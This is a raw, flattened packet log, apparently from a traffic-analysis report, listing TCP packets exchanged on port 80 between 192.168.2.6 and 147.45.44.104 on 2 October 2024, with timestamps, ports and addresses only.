                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864252090 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864269972 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864276886 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864301920 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864314079 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864341974 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864343882 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864357948 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864371061 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864375114 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864384890 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864386082 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864398003 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864402056 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864408970 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864419937 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864423037 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864429951 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864434004 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864440918 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864449978 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864449978 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864469051 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864479065 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864479065 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864490986 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864494085 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864501953 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864511967 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864516020 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864521027 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864531994 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864542961 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864543915 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864553928 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864554882 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864564896 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864576101 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864579916 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864586115 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864595890 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864603043 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864620924 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864672899 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864682913 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864689112 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864700079 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864711046 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864733934 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864809036 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864819050 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864830017 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864840984 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864847898 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864862919 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864880085 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864974022 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864984989 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.864995003 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865005016 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865008116 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865015030 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865021944 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865025997 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865036011 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865045071 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865048885 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865061045 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865086079 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865088940 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865197897 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865231037 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865242004 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865252018 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865262985 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865267038 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865273952 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865283966 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865286112 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865293980 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865305901 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865307093 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865314960 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865320921 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865326881 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865338087 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865349054 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865386009 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865408897 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865408897 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865592003 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865602970 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865614891 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865626097 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865637064 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865642071 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865647078 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865668058 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865669012 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865685940 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865761042 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865772009 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865782976 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865793943 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865797997 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865803957 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865814924 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865824938 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865847111 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.865859985 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866013050 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866023064 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866034031 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866044044 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866054058 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866058111 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866064072 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866075039 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866085052 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866091013 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866095066 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866101980 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866128922 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866159916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866172075 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866183043 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866194010 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866198063 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866214991 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866238117 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866326094 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866338015 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866348982 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866354942 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866359949 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866369963 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866374969 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866380930 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866389036 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866390944 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866401911 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866411924 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866414070 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866422892 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866430998 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866434097 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866445065 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866446972 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866472960 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866753101 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866763115 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866775990 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866786957 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866797924 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866801023 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866807938 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866818905 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866826057 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866830111 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866839886 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866841078 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866862059 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.866887093 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.910968065 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911030054 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911051989 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911067009 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911077976 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911111116 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911118031 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911149979 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911175013 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911183119 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911187887 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911215067 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911223888 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.911560059 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916426897 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916481018 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916486025 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916522980 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916528940 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916579962 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916587114 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916613102 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916652918 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916663885 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916712046 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916744947 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916755915 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916795969 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916829109 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916837931 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916857004 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916867018 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916889906 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916898012 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916929960 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916939974 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916971922 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.916976929 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917006016 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917012930 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917036057 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917046070 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917068958 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917082071 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917104006 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917114019 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917135954 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917167902 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917176962 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917200089 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917208910 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917232990 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917241096 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917265892 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917277098 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917299986 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917309046 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.917337894 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922274113 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922332048 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922334909 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922363997 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922380924 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922415018 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922415972 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922447920 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922460079 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922489882 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922497988 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922532082 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922573090 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922581911 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922615051 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922631025 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922647953 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922657013 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922679901 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922691107 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922713995 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922719955 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922749043 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922759056 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922787905 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922787905 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922818899 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922831059 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922852039 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922878981 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922895908 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922925949 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922928095 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922959089 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922970057 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.922988892 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923003912 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923033953 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923038006 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923070908 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923079014 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923101902 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923110962 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923135042 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923137903 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.923166990 CEST8049726147.45.44.104192.168.2.6
